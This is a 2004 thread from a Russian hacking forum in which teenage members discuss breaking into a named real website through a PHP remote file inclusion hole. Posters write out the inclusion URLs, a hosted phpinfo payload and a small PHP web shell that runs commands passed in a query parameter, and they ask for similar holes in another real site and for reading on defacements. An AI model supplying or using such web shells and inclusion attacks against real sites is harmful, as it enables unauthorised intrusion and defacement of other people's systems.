Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)
-   -   Взлом сайта. Для начаниющих (https://forum.antichat.xyz/showthread.php?t=4480)

kyzmi4 15.12.2004 20:04
Взлом сайта. Для начаниющих
 
Даю адрес сайта, жирном выделяю намек на уязвимсоть:
http://klezz.fatal.ru/index.php?v/full.htm

Вот подумайте.
Меня она очень удивила когда я там (кто знает тот поймет) увидел сайт античата =) :rolleyes:
Сайт ломается!!!

virgoz 16.12.2004 00:44
где ты тама увидел сайт античата?
а сайт не ломается...
команды не хочет выполнять...

SURRENDER 16.12.2004 05:59
kyzmi4, либо адрес карявый, либо это не переменная...

Егорыч+++ 16.12.2004 10:23
Да ломается.... Но я точно ломать не буду

virgoz 16.12.2004 18:29
как вы команды выполняете?
пишет аот что:
Цитата:
Warning: shell_exec(): Cannot execute using backquotes in Safe Mode in http://[target]/shell.txt on line 12
и вот:
Цитата:
Warning: system(): Cannot execute a blank command in http://[target]/shell_pre.php?cmd=ls%20-la on line 3
че не так?

Егорыч+++ 16.12.2004 18:44
в принципе все не так... не все так тривиально...

SHiTS 16.12.2004 19:58
а я как всегда ниче не понял http://klezz.fatal.ru/index.php?v/full.htm
че тут за уязвимость?

Егорыч+++ 16.12.2004 20:03
http://klezz.fatal.ru/index.php?http://www.ru - а вот это понятно? или все еще нет?

SHiTS 16.12.2004 20:04
неа,ладно,не надо объяснять,всё равно не пойму(

Че Гевара 16.12.2004 21:40
А что тут не понимать ?
http://klezz.fatal.ru/index.php?http....ru/pizdez.php - это тоже непонятно ?
где
http://xssteam.narod.ru/pizdez.php
содержит одну строчку ...
PHP код:
   <?
   
 phpinfo();
   
 ?>

virgoz 16.12.2004 22:46
Админы, почему вы все время отвечаете загадками? Неужеле вы желаете, чтобы мы во всем разобрались сами? :) Если же не все так тривиально, почему бы не объяснить?

SHiTS 16.12.2004 23:11
как бы так сказать,я первый раз на прошлой неделе понял что же такое скрипт,поэтому что либо мне пока объяснять-почти бессмысленно

-SX- 17.12.2004 10:09
ВОПРОС:
Написал PHP файл. Имя zz.txt
PHP код:
<?

if (!empty($_GET['c'])) {
    echo '<pre>';
    system($_GET['c']);
    echo '</pre>';
}

exit;

?>
Далее залил на народ ру, прописую http://klezz.fatal.ru/index.php?http://zattack.narod.ru/zz.txt&c=ls%20-l
Нечего не получаеться... Я что-то неправильно делаю??? :confused:

Егорыч+++ 17.12.2004 10:23
Там команда систем не работает. Нужно пользоваться функциями Php

-SX- 17.12.2004 17:26
Цитата:
Сообщение от Егорыч+++
Там команда систем не работает. Нужно пользоваться функциями Php
А… понятно… тнкс.

F-IFTY 17.12.2004 20:04
А есть какой нибудь pizdez для http://student.aipet.kz/

kyzmi4 18.12.2004 02:25
Цитата:
Сообщение от Tessio
А есть какой нибудь pizdez для http://student.aipet.kz/
Я там ничего ненашел :(

kyzmi4 18.12.2004 02:33
Ну что я могу сказать. Учитесь товарищи. Я ведь непросто так дал эту ссылку и зачем орать, что там нет уязвимость. Ненадо спрашивать, как сломать. Нужно полазить посайту, почитать книги. На заметку мне всего 16 лет. Я может не хакер, совсем,нет. Я такойже был, мне надо было все разжевать и положить в рот, но вкой веке дешевая порнуха задолбала и я начал читать книги, лазить по сайтам. Единственный сайт, который мне больше всего нравится это Античат. Добрые админы, хорошие статьи, отличное видео. Вместе с Античатом мы пройдем огонь и воду.

virgoz 18.12.2004 18:33
Цитата:
На заметку мне всего 16 лет
мне 15, и мне тоже понравился античат, и я тоже не хакер, и я тоже читаю книги, и мне тоже задолбала порнуха, НО! если бы у меня спросили где дыра в этом сайте, то я бы ответил...
Парни, ВМЕСТЕ мы пройдем ОГОНЬ и ВОДУ!!! ВМЕСТЕ, А не по одиночке...

SHiTS 18.12.2004 18:45
Цитата:
Сообщение от virgoz
мне 15, и мне тоже понравился античат, и я тоже не хакер, и я тоже читаю книги, и мне тоже задолбала порнуха, НО! если бы у меня спросили где дыра в этом сайте, то я бы ответил...
Парни, ВМЕСТЕ мы пройдем ОГОНЬ и ВОДУ!!! ВМЕСТЕ, А не по одиночке...
мне тоже 15, но я почти ниче не понимаю в хацкерстве,а насчет огня и воды-а медные трубы где??? :)

Че Гевара 18.12.2004 18:48
Цитата:
Сообщение от virgoz
если бы у меня спросили где дыра в этом сайте, то я бы ответил...
Не античат ли ты имеешь ввиду ? ))

SHiTS 18.12.2004 18:52
да,ответь пжалста!

kyzmi4 19.12.2004 04:18
Цитата:
Сообщение от virgoz
мне 15, и мне тоже понравился античат, и я тоже не хакер, и я тоже читаю книги, и мне тоже задолбала порнуха, НО! если бы у меня спросили где дыра в этом сайте, то я бы ответил...
Парни, ВМЕСТЕ мы пройдем ОГОНЬ и ВОДУ!!! ВМЕСТЕ, А не по одиночке...
А в начале топика орал, что сайт сломать нельзя, что он невыполняет клманды. А потом что тебе ваше нечего необьясняют :rolleyes:

PEPSICOLA 20.12.2004 17:25
pizdez! :D

F-IFTY 20.12.2004 17:57
А где про дефейсы почитать можно?...

SHiTS 20.12.2004 18:45
эээ вон там наверно.


Время: 09:58